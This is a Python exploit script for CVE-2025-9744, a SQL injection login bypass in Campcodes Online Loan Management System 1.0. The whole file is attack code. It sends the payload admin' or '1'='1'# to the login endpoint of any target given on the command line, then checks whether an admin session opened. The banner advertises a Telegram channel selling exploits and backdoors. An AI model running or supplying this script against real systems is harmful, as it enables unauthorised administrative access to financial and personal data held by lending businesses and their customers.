Exploit for 📄 Campcodes Online Loan Management System 1.0 SQL Injection CVE-2025-9744

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95

# -*- coding: utf-8 -*-
# Exploit [Loan Management System] v1.0 - SQL Injection
# Google Dork: N/A
# Date: 20/10/2025
# Exploit Author: CodeB0ss
# Vendor: Loan Management System
# Software Link: https://www.loanpro.io/
# Version: <= 1.0.0
# Tested on: Windows
# CVE : CVE-2025-9744
# CVSS Score : 10

from future import print_function
import requests
import sys

banner = '''
-#-
bY t.me/uncodeboss

CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection

[Notification] : Become a VP user and get all the exploits and tools,
backdoors
t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw

[Usage] :
python CVE-2025-9744.py -u http/https or just example.com.
'''

try:
    requests.packages.urllib3.disable_warnings()
except:
    pass

def codeb0ssexp(codeb0ss_base):
    if not codeb0ss_base.startswith("http://") and not codeb0ss_base.startswith("https://"):
        codeb0ss_base = "http://" + codeb0ss_base
    base_url = codeb0ss_base.rstrip("/")
    
    cdb0s = requests.Session()
    cdb0s.headers.update({
        'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101 Firefox/113.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    })
    red = "\033[91m"
    green = "\033[92m"
    post_path = "/ajax.php?action=login"
    get_path = "/index.php?page=home"
    post_url = base_url + post_path
    get_url = base_url + get_path
    username = "admin'+or+'1'%3D'1'%23"
    password = "expbycodeb0ss"
    payload = "username={}&password={}".format(username, password)
    
    try:
        r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
        r_get = cdb0s.get(get_url, timeout=10, verify=False)
        try:
            combined = (r_post.text or "") + (r_get.text or "")
        except Exception:
            combined = (r_post.content or "") + (r_get.content or "")
        group1 = ["window.start_load", "Welcome back Admin", "Loan Management System"]
        group1_ok = all(w in combined for w in group1)
        group2_ok = ("login-form" in combined)
        if group1_ok and group2_ok:
            print(" - " + base_url + " --> " + green + "Vulnerable")
            print(" - {}".format(post_url))
            print(" - {}".format(get_url))
            return 0
        else:
            print(" - " + base_url + " --> " + red + "Not_Vulnerable")
            return 2
    except requests.exceptions.RequestException as e:
        print(" - " + base_url + " --> " + red + "Time0ut")
        return 1

def startexp():
    if '-u' in sys.argv:
        idx = sys.argv.index('-u')
        if idx + 1 < len(sys.argv):
            return sys.argv[idx + 1]
    return None

def main():
    print(banner)
    target = startexp()
    if not target:
        sys.exit(1)
    
    rc = codeb0ssexp(target)
    sys.exit(rc)

if __name__ == "__main__":
    main()